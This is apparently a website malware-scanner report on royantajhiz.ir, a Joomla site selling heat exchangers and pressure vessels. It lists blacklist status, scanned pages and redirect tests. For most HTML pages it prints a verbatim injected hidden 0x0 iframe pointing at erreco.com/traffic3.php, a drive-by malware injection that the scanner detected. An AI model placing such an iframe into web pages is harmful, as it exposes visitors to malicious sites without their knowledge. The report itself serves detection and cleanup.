Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=royantajhiz.ir
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://royantajhiz.ir/ | 200 OK Content-Length: 61078 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="Joomla! - Open Source Content Management" /> <title>Home</ti ...[4416 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://royantajhiz.ir/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://royantajhiz.ir/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://royantajhiz.ir/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://royantajhiz.ir/modules/mod_sp_image_rotator/assets/script/_class.noobSlide.js | 200 OK Content-Length: 5355 Content-Type: application/javascript | clean |
http://royantajhiz.ir/modules/mod_ariyuimenu/mod_ariyuimenu/js/yui.combo.js | 200 OK Content-Length: 136091 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=(""+A[C]).split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length;B=B+1){E[D[B]]=E[D[B]]||{};E=E[D[B]];}}return E;};YAHOO.log=function(D,A,C){var B=YAHOO.widget.Logger;if(B&&B.log){return B.log(D,A,C);}else{return false;}};YAHOO.register=function(A,E,D){var I=YAHOO.env.modules,B,H,G,F,C;if(!I[A]){I[A]={versions:[],builds:[]};}B=I[A];H=D.version;G=D Antivirus reports:
| ||
http://royantajhiz.ir/modules/mod_date2/ty2udate.js | 200 OK Content-Length: 373 Content-Type: application/javascript | clean |
http://royantajhiz.ir/index.php/about-us.html | 200 OK Content-Length: 60431 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/about-us.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="author" content="Master" /> <meta name="generator" content="Joo ...[4374 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/index.php/products/shell-tube-heat-exchangers.html | 200 OK Content-Length: 58221 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/products/shell-tube-heat-exchangers.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="Joomla! - Open Source Conten ...[4372 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/index.php/products/air-coolers.html | 200 OK Content-Length: 58111 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/products/air-coolers.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="Joomla! - Open Source Content Management" / ...[4376 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/index.php/products/pressure-vessels.html | 200 OK Content-Length: 58349 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/products/pressure-vessels.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="Joomla! - Open Source Content Manageme ...[4372 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/index.php/products/spare-parts.html | 200 OK Content-Length: 69485 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/products/spare-parts.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="Joomla! - Open Source Content Management" / ...[4401 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/index.php/supply.html | 200 OK Content-Length: 59789 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/supply.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="author" content="Master" /> <meta name="generator" content="Jooml ...[4374 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> | ||
http://royantajhiz.ir/index.php/supply/heat-exchanger-tubes.html | 200 OK Content-Length: 58675 Content-Type: text/html | malicious |
Page code contains blacklisted domain: erreco.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://royantajhiz.ir/index.php/supply/heat-exchanger-tubes.html" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="author" content="Master" /> <meta name="gene ...[4374 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: royantajhiz.ir
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 06 Mar 2015 09:00:12 GMT
Pragma: no-cache
Server: Apache
Content-Length: 61078
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6b913d78de26215587074821965f7894=e385f9e62c4b0b5dbc35fcdfb5662697; path=/
X-Powered-By: PHP/5.3.29
...61078 bytes of data.
GET / HTTP/1.1
Host: royantajhiz.ir
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 06 Mar 2015 09:00:12 GMT
Pragma: no-cache
Server: Apache
Content-Length: 61078
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6b913d78de26215587074821965f7894=e385f9e62c4b0b5dbc35fcdfb5662697; path=/
X-Powered-By: PHP/5.3.29
...61078 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: royantajhiz.ir
Referer: http://www.google.com/search?q=royantajhiz.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: royantajhiz.ir
Referer: http://www.google.com/search?q=royantajhiz.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.